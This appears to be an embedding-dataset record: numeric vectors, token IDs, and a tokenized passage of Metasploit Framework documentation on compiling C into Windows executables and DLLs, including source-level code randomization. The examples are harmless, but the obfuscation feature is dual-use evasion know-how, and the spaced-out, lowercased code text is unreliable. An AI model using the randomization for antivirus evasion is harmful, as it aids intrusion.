0.10049404203891754, -0.258341521024704, -0.5019911527633667, 0.3588517904281616, -0.05010813847184181, 0.053545791655778885, 0.8194528818130493, 0.3594056963920593, -0.5609515905380249, 0.3115907907485962, 0.5130037665367126, -0.3417520821094513, 0.10410816222429276, -0.7881799936294556, 0.5596197843551636, 0.6997103095054626, -0.3819448947906494, 0.1887066513299942, -0.4154793918132782, 1.411656141281128, 0.27764320373535156, -0.4895036816596985, -0.6395022869110107, -0.8974157571792603, 0.3063308298587799, 0.03506333753466606, 0.4113701581954956, -0.16348271071910858, 0.16439366340637207, -0.3438660204410553, 0.005080449860543013, 0.11788348853588104, -0.7362160086631775, -1.262507438659668, -0.2089356929063797, -0.41303500533103943, -0.2583351135253906, 0.38512009382247925, 0.918796181678772, -0.09312272816896439, -0.4876050353050232, -0.16735349595546722, -0.5414746999740601, 0.002889621537178755, -0.7539581656455994, 0.15985049307346344, -0.7908143401145935, 0.20874041318893433, -0.6749537587165833, 0.5986108183860779, -0.5826751589775085, 0.05384024605154991, 0.15817870199680328, 0.591912031173706, 0.18901176750659943, -0.42023521661758423, -0.1984829157590866, 0.523999810218811, 0.07690788060426712, -0.2951681613922119, -0.2833378314971924, 0.3701436519622803, -0.5684166550636292, 0.4639705419540405, -0.31160131096839905, -0.283166766166687, -0.8691774010658264, -0.6888766884803772, 0.23588798940181732, -0.05221675708889961, 0.014445072039961815, -0.6473876237869263, -0.5132238268852234, -0.3231446444988251, 0.12933367490768433, 0.03293110430240631, -1.2831580638885498, -0.10325320065021515, -0.19378751516342163, 0.8977808952331543, 0.24080725014209747, -0.08052337169647217, -0.24830995500087738, -0.312382310628891, -0.46617391705513, 0.8114533424377441, 0.2587619125843048, 0.07475601136684418, -0.6070746779441833, 0.3405351936817169, 0.5225239992141724, 0.26362597942352295, -0.41838499903678894, -0.2835857570171356, -0.035784393548965454, 0.044434621930122375, -0.34222331643104553, 0.8800038695335388, -0.6570465564727783, 0.5391637086868286, -0.22328628599643707, 0.28917574882507324, -0.20152410864830017, -0.21959911286830902, 0.1178007647395134, 0.6464412212371826, 0.9761130809783936, -0.41547638177871704, -0.1282476931810379, -0.14672096073627472, 1.013975977897644, 0.3946153521537781, -0.48075348138809204, -0.014786818996071815, -0.159040629863739, -1.0531734228134155, -1.2797799110412598, 0.7288100123405457, 0.6732937693595886, -0.3018103241920471, 0.5560793280601501, 0.31112244725227356, 0.9146435260772705, -0.7734221816062927, 0.47983309626579285, 1.173304796218872, 0.3165321946144104, -0.034508030861616135, -0.7846903204917908, 0.15528352558612823, 0.6719979643821716, -0.230499267578125, 0.3048269748687744, 0.09751106798648834, 0.06423406302928925, -0.050408635288476944, -0.2364407479763031, -0.4961696267127991, -0.7488469481468201, -0.2191367745399475, 1.015297770500183, -0.8231356739997864, 0.306498646736145, 0.22081850469112396, -0.704296886920929, -0.6420055031776428, 0.37273332476615906, -0.48053836822509766, -0.589216947555542, 0.08989254385232925, 0.6409416198730469, 0.39642030000686646, -0.15531249344348907, -0.46618926525115967, -0.2816803753376007, -0.16044887900352478, 0.7287108898162842, 0.01044834777712822, -0.4647678732872009, 0.9085423946380615, 0.3685567080974579, -0.9059942364692688, -0.2698664665222168, -0.6552577018737793, 0.0021240697242319584, 0.09139221161603928, -0.55247962474823, -0.8607742786407471, 0.22697757184505463, 0.3709036111831665, -0.2603914439678192, 0.04093703255057335, -0.11776592582464218, 0.21985125541687012, -0.20092369616031647, 0.32754144072532654, -0.18777237832546234, 0.6384063363075256, 0.4870651960372925, -0.4278426170349121, -0.06408089399337769, -0.6394038200378418, -0.3517531454563141, 0.44742241501808167, 0.44024595618247986, 1.2155295610427856, 0.14452113211154938, 0.7538124918937683, 0.04881712794303894, -0.2699047327041626, 0.5477887392044067, -0.3052598536014557, 0.1836545467376709, 0.8704260587692261, -0.35662969946861267, -0.8786436915397644, -0.4479626715183258, -0.1050395742058754, -0.043509580194950104, 0.22031539678573608, -0.3660624623298645, -0.4234960377216339, -0.02719685435295105, -0.19424006342887878, -0.03919210284948349, -0.8919557929039001, -0.054892320185899734, -0.6339505314826965, -0.12669093906879425, -0.1621876060962677, -0.15192963182926178, -0.8237143754959106, -0.35065871477127075, -0.09481491148471832, -0.35913485288619995, -0.34986039996147156, 0.733692467212677, 0.2587442100048065, 0.07302983850240707, -0.5827985405921936, -0.12802566587924957, -1.0255911350250244, -0.8188464045524597, -0.040944989770650864, -0.22120144963264465, 0.16822153329849243, -1.4372204542160034, -0.32784703373908997, -0.5175108909606934, 0.006063453853130341, -0.012073938734829426, -0.6552044153213501, 0.035536397248506546, -0.31091099977493286, -0.8399363160133362, 0.6621558666229248, 0.23358552157878876, -0.6573605537414551, 0.6709538102149963, 0.019007569178938866, 0.34838756918907166, 0.2237730622291565, -0.5106351375579834, -0.25760552287101746, 0.03520611673593521, 0.21272602677345276, 0.4238484501838684, 0.08849253505468369, -0.14085066318511963, 0.23090533912181854, -0.369271457195282, -0.9490547180175781, -0.31690236926078796, -0.2912999391555786, 0.1681312471628189, 0.37065327167510986, -0.15721698105335236, 0.2699815630912781, 1.1987831592559814, 0.4560398459434509, 0.5249772667884827, -0.005084072705358267, 1.0521492958068848, 0.3284463584423065, 0.3115396201610565, -0.03729383274912834, 0.004147099331021309, 0.23717981576919556, -0.6501908898353577, 0.1004951223731041, 0.08666926622390747, -0.5754787921905518, 0.8991138339042664, -0.2385132908821106, 0.21070913970470428, -0.7432584166526794, -0.0002900141989812255, 0.23745134472846985, 0.527828574180603, 0.3069324791431427, -0.5254980325698853, 0.17202021181583405, -0.2973317503929138, -0.12201771140098572, 0.027338339015841484, -0.23696567118167877, 0.08821287751197815, -0.15014731884002686, -0.7907819151878357, -0.21749074757099152, -0.2958920896053314, -0.3400120139122009, -0.032925769686698914, -0.028171731159090996, -0.33416154980659485, 0.06144056096673012, -0.28356441855430603, 0.36537671089172363, 0.9622783660888672, -1.304235816001892, 0.06972072273492813, -0.4115352928638458, 0.290427565574646, -0.4905977249145508, -0.9158213138580322, 0.8329787254333496, 0.5493614077568054, 0.36322999000549316, 0.08610294759273529, 0.01661456748843193, 0.21713656187057495, -0.35222339630126953, 0.7475365996360779, -0.12417005747556686, 0.1741686463356018, -0.7250753045082092, 0.06398897618055344, -0.23015455901622772, -0.07991839945316315, -0.20301583409309387, -0.18251727521419525, 0.3697316348552704, -0.05090196430683136, -0.13248811662197113, 0.7584547400474548, -0.225945383310318, 0.22538568079471588, 0.8084021806716919, 0.675711452960968, 0.46768733859062195, -0.004351075738668442, -0.005604997742921114, 0.1480744481086731, -0.013183309696614742, 0.47487425804138184, 0.19926370680332184, 0.13753540813922882, 0.5081948637962341, 0.2648635804653168, -0.8193216323852539, -0.32812970876693726, 0.3810253143310547, 0.07513641566038132, -0.4149628281593323, -0.12708516418933868, 0.222148135304451, -0.09061794728040695, 0.06916682422161102, 0.15102951228618622, 0.5100581645965576, 0.010019016452133656, -0.02974887005984783, -0.5858287215232849, -0.20442521572113037, 0.3592683672904968, -0.6082125902175903, 0.2917979061603546, -0.057155508548021317, -0.17230361700057983, 0.46155038475990295, 0.054797545075416565, -0.7819066643714905, 0.5213146209716797, 1.0455397367477417, 0.2904893159866333, -0.7005961537361145, 0.5828307867050171, 0.19527733325958252, 0.4579744338989258, 0.4465876817703247, -0.2465074360370636, -0.13813215494155884, 0.4626407027244568, -0.4432505667209625, -0.3594416677951813, -0.3328385055065155, 0.08419191837310791, 0.04500298574566841, 0.1397075653076172, -0.07000896334648132, -0.20728884637355804, 0.40961867570877075, -0.6143234968185425, 0.19016601145267487, -0.6311432123184204, 0.23712337017059326, 1.0674930810928345, -0.183814138174057, -0.4154975116252899, 1.1472047567367554, 0.4876970648765564, 0.6207064390182495, 0.27511993050575256, 1.1427342891693115, 0.30380380153656006, 0.22589509189128876, 0.14104823768138885, -0.1129838079214096, 0.12054251879453659, -0.25017186999320984, -0.5203261375427246, -0.5341086387634277, 0.4345151484012604, -0.3167267143726349, 0.5457971692085266, 0.025531519204378128, -0.2992638945579529, -0.6186225414276123, -0.052945930510759354, 0.09257836639881134, -1.0758299827575684, 0.5889167785644531, -0.4456886947154999, -0.6622883081436157, -0.16233447194099426, 0.45169228315353394, 0.41810843348503113, 0.23978786170482635, -0.2164982259273529, -0.9258069396018982, -0.38885295391082764, -0.19098620116710663, -0.6083388924598694, 0.7908682227134705, -0.43992316722869873, -0.31650444865226746, -0.1530713438987732, -0.6055348515510559, -0.2539357841014862, 0.13807444274425507, -0.21757914125919342, -0.2723217010498047, 1.140755534172058, 0.42036867141723633, 0.3937605619430542, 0.22045893967151642, -0.46415743231773376, -0.8126229047775269, 0.14045602083206177, 0.706853449344635, -0.14998160302639008, 0.8860006332397461, 0.5011639595031738, 0.3083878457546234, 0.47659027576446533, 0.15611626207828522, 0.4427177309989929, -0.11727944761514664, -0.2430708259344101, -0.06225578114390373, -0.04966631531715393, -0.09768272191286087, -0.7762060165405273, 0.02484874241054058, 0.6492458581924438, 0.4296392798423767, -0.32814815640449524, -1.1128796339035034, -0.09488102793693542, -0.6104366779327393, 0.015111017972230911, -0.19543516635894775, 0.3747876286506653, 0.07381001114845276, -0.29724374413490295, 0.948670506477356, -0.9407321810722351, 4.305324077606201, 0.28201696276664734, -0.0711473673582077, 0.1860279142856598, -0.02210085839033127, 0.8163988590240479, 0.7350704669952393, -0.36712658405303955, 0.6055112481117249, -0.17552967369556427, 0.3747994005680084, -0.19471651315689087, 0.6272825598716736, 0.6662837266921997, 0.4521169364452362, 0.7827295064926147, -0.6912451982498169, 0.1252276450395584, 0.6624701023101807, -0.9420768022537231, -1.0903056859970093, 0.09857107698917389, -0.4709235727787018, 0.9594916105270386, 0.5373411178588867, 0.09030408412218094, 0.0021842692513018847, -0.10935613512992859, -0.34398311376571655, 0.08969901502132416, 0.3436695337295532, -0.6394654512405396, 0.6607290506362915, -0.04749637097120285, -1.1558403968811035, -0.34593886137008667, -0.22101998329162598, -0.8588860630989075, -0.33585450053215027, -0.08258721977472305, 0.13780368864536285, -0.032619085162878036, 0.1315908282995224, -0.17235524952411652, 0.1705961674451828, 0.647834837436676, -0.5195119380950928, 0.21925337612628937, 0.6081346869468689, -1.1417962312698364, 0.9891498684883118, 0.1285954713821411, 0.3900933861732483, -0.02312435582280159, -0.9501535296440125, -0.011028443463146687, -0.11522530764341354, -0.4047168493270874, -0.0940885916352272, 0.307722806930542, 0.45057886838912964, -0.5339712500572205, 0.06382942199707031, 0.03571965917944908, -0.7632467746734619, 0.23296743631362915, -0.19614583253860474, 0.4860720932483673, -0.4256655275821686, -0.4354667067527771, -0.10608917474746704, 0.3487820327281952, 0.49946287274360657, -0.1385762095451355, 0.7548677325248718, 0.028895454481244087, 0.06785111874341965, 0.12581294775009155, 1.1127359867095947, -0.2869449257850647, -0.13857613503932953, -0.5326087474822998, -1.107554316520691, -0.021874481812119484, 0.6159027218818665, 0.22947868704795837, -0.635193407535553, -0.8302010297775269, -0.7326105237007141, -0.013352207839488983, 0.3592289090156555, 0.4681512713432312, -0.28342142701148987, 0.461232990026474, -0.0038864377420395613 ]
[ 101, 2006, 2023, 3931, 10288, 2063, 2742, 19422, 2140, 2742, 16550, 2546, 1006, 1007, 7661, 20346, 9363, 3207, 6721, 3989, 11368, 3022, 24759, 28100, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 2003, 1037, 10236, 4842, 1997, 18804, 6491, 4919, 2005, 21953, 1039, 3642, 2005, 1996, 3645, 4132, 1012, 1996, 3800, 1997, 1996, 10236, 4842, 2003, 2000, 2490, 12398, 20346, 2015, 1010, 2107, 2004, 2358, 20617, 1012, 1044, 1010, 2358, 20617, 1012, 1044, 1010, 5164, 1012, 1044, 1010, 3645, 1012, 1044, 1010, 2030, 2070, 2060, 2590, 20346, 2015, 2008, 2017, 2453, 2224, 2096, 3015, 1999, 1039, 1012, 4654, 2063, 2742, 2278, 1035, 23561, 1027, 1003, 1053, 1064, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 20014, 2364, 1006, 11675, 1007, 1063, 6948, 16649, 16344, 6948, 7834, 3736, 3351, 1027, 1000, 7592, 2088, 1000, 1025, 6948, 16649, 16344, 6948, 3775, 9286, 1027, 1000, 7632, 1000, 1025, 4471, 8758, 1006, 19701, 1010, 6948, 7834, 3736, 3351, 1010, 6948, 3775, 9286, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 1064, 5478, 1005, 18804, 13102, 4135, 4183, 1013, 7705, 1013, 21624, 1013, 3645, 1005, 1001, 1001, 3828, 2004, 2019, 4654, 2063, 8023, 4654, 2063, 1027, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 1039, 1006, 1039, 1035, 23561, 1007, 1001, 1001, 3828, 1996, 12441, 2004, 1037, 5371, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 1039, 1035, 2000, 1035, 5371, 1006, 1005, 1013, 1056, 8737, 1013, 3231, 1012, 4654, 2063, 1005, 1010, 1039, 1035, 23561, 1007, 21469, 2140, 2742, 2278, 1035, 23561, 1027, 1003, 1053, 1064, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 22017, 2140, 17928, 4765, 2854, 21469, 19145, 2378, 1035, 1035, 17961, 1035, 1035, 1006, 1006, 9167, 1007, 1007, 1006, 20287, 7716, 9307, 20287, 7716, 9307, 1010, 1040, 18351, 1040, 13088, 5243, 3385, 1010, 6948, 6767, 3593, 6948, 6072, 25944, 1007, 1063, 6942, 1006, 1040, 13088, 5243, 3385, 1007, 1063, 2553, 21469, 2140, 1035, 2832, 1035, 22476, 1024, 4471, 8758, 1006, 19701, 1010, 1000, 7592, 2088, 1000, 1010, 1000, 7592, 1000, 1010, 16914, 1035, 7929, 1007, 1025, 3338, 1025, 2553, 21469, 2140, 1035, 11689, 1035, 22476, 1024, 3338, 1025, 2553, 21469, 2140, 1035, 11689, 1035, 20010, 6776, 1024, 3338, 1025, 2553, 21469, 2140, 1035, 2832, 1035, 20010, 6776, 1024, 3338, 1025, 1065, 2709, 2995, 1025, 1065, 1013, 1013, 2023, 2097, 2022, 1037, 3853, 1999, 1996, 9167, 2795, 20014, 5796, 2290, 1035, 1035, 17961, 1035, 1035, 1006, 1006, 9167, 1007, 1007, 1006, 11675, 1007, 1063, 4471, 8758, 1006, 19701, 1010, 1000, 7592, 2088, 1000, 1010, 1000, 7592, 1000, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 1064, 5478, 1005, 18804, 13102, 4135, 4183, 1013, 7705, 1013, 21624, 1013, 3645, 1005, 21469, 2140, 1027, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 1039, 1006, 1039, 1035, 23561, 1010, 1024, 21469, 2140, 1007, 2000, 7170, 1037, 21469, 2140, 1010, 2017, 2064, 2224, 1996, 7170, 29521, 19848, 2100, 17928, 1024, 1001, 2421, 1026, 3645, 1012, 1044, 1028 ]
metasploit
127.txt
0
# include < stdio. h > int main ( void ) { hmodule hmod = loadlibrary ( " hello _ world. dll " ) ; if ( hmod ) { printf ( " hello _ world. dll loaded \ n " ) ; } else { printf ( " unable to load hello _ world. dll \ n " ) ; } } or call the function in export with rundll32 : rundll32 hell _ world. dll, msg printf ( ) methods like printf ( ) won ’ t actually print anything, because it ’ s not connected up to stdout. if you want to use printf ( ) for debugging purposes, consider using outputdebugstring, or messagebox. custom headerscurrently, the metasm wrapper does not support custom headers from an arbitrary location. to work around this, you can place your headers in data / headers / windows, and then add that file name in lib / metasploit / framework / compiler / headers / windows. h. code randomizationmetasploit : : framework : : compiler supports obfuscation that randomizes code at the source code level, and then compile. there are two methods we can use : metasploit : : framework : : compiler : : windows. compile _ random _ cmetasploit : : framework : : compiler : : windows. compile _ random _ c _ to _ filemetasploit : : framework : : compiler : : windows. compile _ random _ c _ to _ file example : require'msf / core'require'metasploit / framework / compiler / windows'c _ source _ code = % q | # include < windows. h > int main ( ) { const char * content = " hello world " ; const char * title = " hi " ; messagebox ( 0, content, title, mb _ ok ) ; return 0 ; } | outfile = " / tmp / helloworld. exe " weight = 70 # this value is used to determine how random the code gets. metasploit : : framework : : compiler : : windows. compile _ random _ c _ to _ file ( outfile, c _ source _ code, weight : weight ) [SEP]
[ -0.16234168410301208, -0.4403597116470337, 0.4504753053188324, -0.21366563439369202, -0.14324727654457092, -0.6004900932312012, -0.38613322377204895, 0.4246574938297272, 0.1743887960910797, 0.3716023862361908, -0.01295770239084959, -0.2592256963253021, 0.1758149117231369, -0.23853373527526855, -0.6775631308555603, -0.035586968064308167, 0.1587815135717392, -0.4074856638908386, -0.8169101476669312, 0.888978123664856, -0.10045931488275528, -0.3881949484348297, -1.2777999639511108, -0.04856837913393974, -0.8664830923080444, -0.3644780218601227, 0.10160404443740845, -0.811204195022583, 1.1057662963867188, 1.215535044670105, 0.4428768754005432, 0.23710156977176666, -0.07972222566604614, -1.1706007719039917, 0.22136053442955017, -0.09123549610376358, 1.0321271419525146, -0.7802075147628784, 0.12526541948318481, -0.25468507409095764, -0.3938896954059601, 0.2196086049079895, 0.44889867305755615, -0.9810633659362793, -0.509560763835907, -0.4566406309604645, 0.2861821949481964, 0.6830572485923767, 0.7010185718536377, 0.33377569913864136, 0.06492471694946289, 0.4377354681491852, -0.27427661418914795, -0.5286446213722229, -0.4707393944263458, -0.07738366723060608, -0.45149385929107666, 0.050860725343227386, -0.4401171803474426, 0.4347861111164093, 0.18287451565265656, 0.5178931951522827, 0.006139699369668961, -0.8337734937667847, 0.43145954608917236, 0.8557019233703613, -0.2076341211795807, 0.3339540362358093, -0.198018878698349, 0.08496171981096268, 0.3824445605278015, 1.3060998916625977, -0.23896995186805725, -0.557783842086792, -0.3755775988101959, -0.6163995265960693, 0.08988627791404724, -0.04671479016542435, -0.5471274256706238, 0.6637797355651855, -0.3943144977092743, 0.5048839449882507, 0.04267311468720436, -0.4500921666622162, -0.35293230414390564, -1.244184970855713, 0.07843276858329773, -0.5200826525688171, -0.5915908217430115, 0.08090368658304214, -0.07735654711723328, 0.07658549398183823, 0.0835525318980217, 0.17762219905853271, 0.8001123070716858, 0.8905442357063293, -0.12011512368917465, 0.18932852149009705, -0.5021798610687256, 0.18789410591125488, 0.7067276239395142, 0.9867978096008301, -0.6913000345230103, 0.12581202387809753, 0.1024589091539383, 0.3591238260269165, 0.5868068933486938, 0.41885459423065186, -0.9184353351593018, -0.5763640403747559, 0.2859695553779602, 0.3299102187156677, -0.4551263451576233, -0.007925841026008129, 0.47656065225601196, 0.2691018283367157, 0.4256097376346588, 0.3935096859931946, -0.4855966567993164, -0.22283387184143066, 0.7027937769889832, -0.11220148950815201, -0.2878303825855255, -0.7131072878837585, -0.14658573269844055, 0.5139045119285583, -0.3108506202697754, 1.4074302911758423, -0.5857983827590942, -0.2422056347131729, -0.2245112955570221, -0.07604540884494781, -0.05170033872127533, 0.5245985984802246, -0.2564201056957245, 1.0615638494491577, 0.5132542848587036, -0.10958227515220642, 0.33305370807647705, -0.9789166450500488, 1.0216509103775024, -0.15809831023216248, -0.21873515844345093, 1.3611340522766113, -0.130252867937088, 0.28771016001701355, 0.07109741866588593, 1.0160596370697021, -0.206947922706604, 0.5642220973968506, -0.36737868189811707, 0.08062639832496643, 0.18129976093769073, 0.3541908264160156, 0.7494189739227295, -0.12114538997411728, -0.6484684348106384, 0.5579864382743835, 0.024773703888058662, 0.1708350032567978, 0.11994170397520065, 0.824497401714325, -0.4879135191440582, 0.6279063820838928, -0.1812947541475296, 0.5352526307106018, -0.5247375965118408, -0.37688466906547546, -0.5918756723403931, -0.30812814831733704, 0.20874781906604767, -0.2323995679616928, -0.5387129187583923, 0.4279739260673523, 1.1220585107803345, 0.6634549498558044, 0.10531748086214066, 0.06693944334983826, 0.22936099767684937, 0.5682889223098755, -0.7802886366844177, 0.8869680762290955, 0.13089284300804138, 0.7177287936210632, -0.15010395646095276, -0.05177900567650795, 0.4090903103351593, -0.139766126871109, -0.46098917722702026, 0.16166676580905914, 0.8259506225585938, 0.3997671902179718, -0.5426748991012573, 0.4745037853717804, 0.0005809636204503477, 0.14793747663497925, -0.951226532459259, 0.07060772180557251, -0.4278925061225891, -0.6945325136184692, -0.7289651036262512, 0.29219263792037964, -0.21746650338172913, 0.6117523908615112, -0.1093621626496315, -0.3013540506362915, 0.5193045735359192, 0.5913732051849365, -0.0239240862429142, -0.3363591730594635, 0.4688701629638672, -0.2768506407737732, -0.6501272320747375, 0.7072048187255859, 0.17551520466804504, 0.1351156383752823, -0.5751324892044067, -0.16005553305149078, -0.26295268535614014, -0.09062870591878891, -0.17725448310375214, 0.7321785092353821, 0.5287145376205444, 0.44039762020111084, -0.671910285949707, -0.5134758949279785, 0.5060036182403564, 0.2979610860347748, 0.39521583914756775, 0.005905201192945242, 0.07233210653066635, 0.3185896575450897, -0.10830678045749664, 0.6424334645271301, -0.16713184118270874, -0.38226839900016785, 0.7182453870773315, 0.48271849751472473, -0.0451073981821537, 0.21582669019699097, -0.3107573688030243, 0.22073321044445038, -0.36351823806762695, 0.14505258202552795, -0.12497963756322861, 0.5448622107505798, 0.7696942090988159, -0.36100831627845764, 0.5824210047721863, -0.14883360266685486, -0.5969706177711487, 0.9800863862037659, 0.36253878474235535, 0.03796497732400894, -0.961818516254425, -0.8114003539085388, -0.0925946831703186, 0.520729660987854, -0.9455527663230896, -0.0017201951704919338, 0.39837855100631714, 0.30531421303749084, -0.09683465212583542, -0.5015303492546082, -0.36843258142471313, 0.6346611380577087, 0.05810340493917465, -0.3032972812652588, -0.2800101637840271, -0.9583902359008789, 0.07754648476839066, 0.08228190243244171, -0.28103193640708923, -0.029111960902810097, -0.6319177746772766, -0.015851808711886406, 0.0936577320098877, -0.34328246116638184, -0.17571835219860077, -0.4846423268318176, 0.450206995010376, 0.23034459352493286, 0.23572038114070892, 0.2950163185596466, 0.4452858567237854, -1.143347978591919, -0.28952810168266296, -0.07377541065216064, -0.020071011036634445, 1.0301185846328735, -0.8268133401870728, 0.2951352298259735, -0.004733813460916281, -0.42641812562942505, 0.047523997724056244, -0.28646159172058105, 0.19883249700069427, -0.21542972326278687, -0.1734364628791809, -0.1863759309053421, -0.6956195831298828, 0.10762009024620056, 0.4224173426628113, -0.3142673671245575, -0.43491819500923157, 0.45330244302749634, 0.03241583704948425, -0.4071218967437744, 0.6644535660743713, 0.5237100720405579, -0.44233280420303345, 0.6690360307693481, 0.25075802206993103, -0.4732149839401245, -1.245420217514038, 0.7211915850639343, 0.27715277671813965, 0.12164364010095596, -0.3314465582370758, -0.8035248517990112, -0.6812667846679688, -0.05409005656838417, -0.1510394811630249, -0.3503831624984741, -0.35803332924842834, 1.0286227464675903, 0.5696511268615723, -0.9102766513824463, 0.25043973326683044, -0.5562515258789062, -0.12557049095630646, 0.2285401076078415, -0.01414826326072216, 0.5284510254859924, 0.27470114827156067, 0.4950115978717804, -0.4918298125267029, 0.3568044602870941, -0.24558448791503906, -0.313400000333786, -0.1837894767522812, -0.22726324200630188, 0.4121895432472229, 0.5443938374519348, -0.11893830448389053, 0.2948918342590332, 0.4190213680267334, -0.41989532113075256, -0.11912485957145691, -0.39865076541900635, -0.10958865284919739, -0.48473769426345825, -0.13544568419456482, 0.379457026720047, 0.3433610796928406, 0.8570747375488281, -1.3082337379455566, -0.14664492011070251, -0.18615789711475372, 0.03841781988739967, 0.22359399497509003, 0.05743519216775894, -0.44401177763938904, 0.0950685515999794, -0.3337009847164154, -0.3890453279018402, -0.32694971561431885, 0.8415339589118958, 0.6507918834686279, -0.5149219036102295, 0.8264347314834595, -0.7468428015708923, -0.8476595878601074, -0.1583091765642166, -0.010210242122411728, -0.23891645669937134, 0.17109110951423645, 0.39767131209373474, 0.055270347744226456, -0.575080394744873, 0.17688202857971191, -0.10571739077568054, 0.4852832853794098, 0.6104381680488586, 0.2971649467945099, 0.33728358149528503, -0.3269435465335846, -0.3414399027824402, -0.4811374545097351, -0.07599546760320663, -0.43324604630470276, -0.5708910822868347, 0.7415984869003296, -1.0805189609527588, -0.2674194872379303, -0.7844588756561279, 1.1340891122817993, 0.9051515460014343, 0.6395543217658997, 0.8071405291557312, -0.029536040499806404, -0.03329065814614296, 0.07849045842885971, 0.660750150680542, -0.361728310585022, 1.0036247968673706, -0.3589344322681427, 1.1068754196166992, -0.6704772710800171, 0.4456777572631836, -0.7259900569915771, 0.4348391890525818, 0.13534383475780487, 0.2964266538619995, 0.4064440131187439, 0.04711320623755455, -0.21213136613368988, 0.5082297325134277, 0.2834908068180084, 0.02346784621477127, -0.5043587684631348, 0.28163355588912964, 0.13797198235988617, 0.010919379070401192, 0.24846157431602478, -0.7601276636123657, -0.4413934350013733, -0.3197501301765442, 0.6067700982093811, 0.43946802616119385, -0.21021237969398499, -0.13251043856143951, -0.8772115707397461, -0.215968519449234, -0.7953134179115295, 0.8557143211364746, 0.516356885433197, -0.3870030343532562, 0.5210803151130676, -0.9450966715812683, 0.029822826385498047, -0.6195516586303711, -0.9601618051528931, -0.21616120636463165, 0.3983134329319, -0.3707822263240814, 0.48322001099586487, -0.34086668491363525, -0.21284635365009308, -0.1893784999847412, 1.0138201713562012, -0.889532208442688, -0.2773871421813965, -0.1777050793170929, 0.3464058041572571, -0.025337714701890945, 0.1132805123925209, -0.25317347049713135, -0.025826336815953255, -0.7744898796081543, -0.36671584844589233, -0.3575800955295563, 0.3544161319732666, -0.5467790365219116, -0.346215158700943, 0.6908912062644958, -0.27215275168418884, 0.11750414967536926, 0.9264578223228455, -0.1758878529071808, -0.36473068594932556, 0.16986900568008423, 0.9995537400245667, -0.07979374378919601, -0.39476844668388367, -0.9383974671363831, 0.23471082746982574, 0.24084831774234772, -0.08948133140802383, 0.26270654797554016, -0.8870647549629211, 1.5496875047683716, 0.21284383535385132, -0.7023561596870422, 0.14904509484767914, -0.9104592800140381, 0.24147604405879974, 0.24056074023246765, 0.13291727006435394, 0.03696856647729874, -0.4441073536872864, -0.652952253818512, -0.2805698812007904, -0.5161142349243164, 0.21754634380340576, -0.36828044056892395, -0.2584858238697052, -0.45357006788253784, 0.3246958553791046, 0.5288335680961609, 0.8164520263671875, -0.6340958476066589, -1.0226397514343262, -0.1726064234972, -0.3174467086791992, 0.02980811335146427, -0.4723395109176636, 0.512136697769165, -0.4222574234008789, 0.11271467804908752, -0.4689008891582489, -0.08670800179243088, -0.21659007668495178, 0.46183285117149353, 0.17639955878257751, 0.6219378709793091, 0.7320490479469299, -0.33745449781417847, -0.06945927441120148, 0.7126026749610901, 0.3641106188297272, -0.8466553688049316, -0.36907827854156494, 0.16833844780921936, -0.11080954223871231, 0.1972072720527649, 0.010064602829515934, -0.6820164322853088, -0.3495315611362457, -0.19460219144821167, 0.06851251423358917, -0.2919400930404663, -0.43156495690345764, -1.1098192930221558, -0.5816009640693665, -0.301706999540329, 0.5972564220428467, 0.10503507405519485, -1.4559030532836914, 0.08233238756656647, -0.3068346083164215, 0.3809254765510559, -0.44881361722946167, -0.3678456246852875, -0.4630197584629059, -0.5533503890037537, -0.09224241971969604, 0.8226622343063354, -0.00893841776996851, -0.12507012486457825, -0.8750479817390442, 0.7748135924339294, 0.020084042102098465, 0.3937860131263733, -0.05027925223112106, 0.036042649298906326, 0.17099077999591827, 0.41940170526504517, 0.07664699852466583, 1.0429199934005737, -0.5001648664474487, 0.4018900394439697, 0.014255605638027191, 0.8058077692985535, -0.9255470633506775, 0.04338551312685013, 0.1044452115893364, 0.6666797399520874, 0.6281875371932983, -0.3534737825393677, 0.3095448315143585, -0.1712539941072464, 0.4815616011619568, 0.08876654505729675, -0.3590918183326721, 0.15507788956165314, 0.1942131370306015, -0.8211864233016968, -0.3910413682460785, 0.6691241264343262, 0.20337499678134918, -0.501147985458374, 0.5509961843490601, -0.0019604808185249567, 0.7906099557876587, -0.7870160937309265, 0.8504974246025085, 1.0895057916641235, 0.20491789281368256, -0.4889140725135803, -0.4495851993560791, 0.2554226219654083, 0.2510351538658142, -0.3756791353225708, 0.7957601547241211, 0.5598496794700623, 0.09706579893827438, -0.23236790299415588, -0.30531665682792664, -0.14718766510486603, -0.6100043058395386, 0.08929180353879929, 0.8092885613441467, -0.13917690515518188, 0.07411783933639526, 0.19634225964546204, -1.1135207414627075, -0.3238399028778076, 0.46493205428123474, -0.3772478997707367, 0.07682231068611145, 0.20532694458961487, 0.7816455364227295, 0.31041210889816284, 0.14160530269145966, -0.6067876219749451, -0.18997983634471893, -0.1405109167098999, 0.9142799973487854, -0.3889036774635315, -0.3358781337738037, 0.5249398946762085, 0.24287179112434387, -0.723761796951294, -0.7452677488327026, -1.0494422912597656, -0.09695209562778473, -0.0876629427075386, -0.4935258626937866, -0.9465811252593994, 0.2701065242290497, -0.4972072243690491, 0.22281838953495026, 0.1443122923374176, -0.26110026240348816, -0.041500356048345566, -0.08832459896802902, 0.15123027563095093, -0.08255379647016525, 0.7469990849494934, 0.6950842142105103, 0.1892155557870865, 0.4745526909828186, -0.2244366705417633, -0.0023074564523994923, -0.3533247411251068, 0.32526978850364685, 0.07367456704378128, 0.5266400575637817, 0.8789359927177429, 0.3052070140838623, 0.10822910070419312, 0.32144156098365784, -0.13335373997688293, 0.21397054195404053, 0.08527650684118271, -0.6001945734024048, -0.7940892577171326, -0.30233436822891235, 0.09143402427434921, -0.19232727587223053, 0.1584474891424179, 0.2596304714679718, -0.09048423171043396, 0.32408809661865234, 0.05629013478755951, 0.5913087725639343, -0.8295122385025024, 0.6193680763244629, -0.5483941435813904, -0.6075896620750427, -0.4548105299472809, 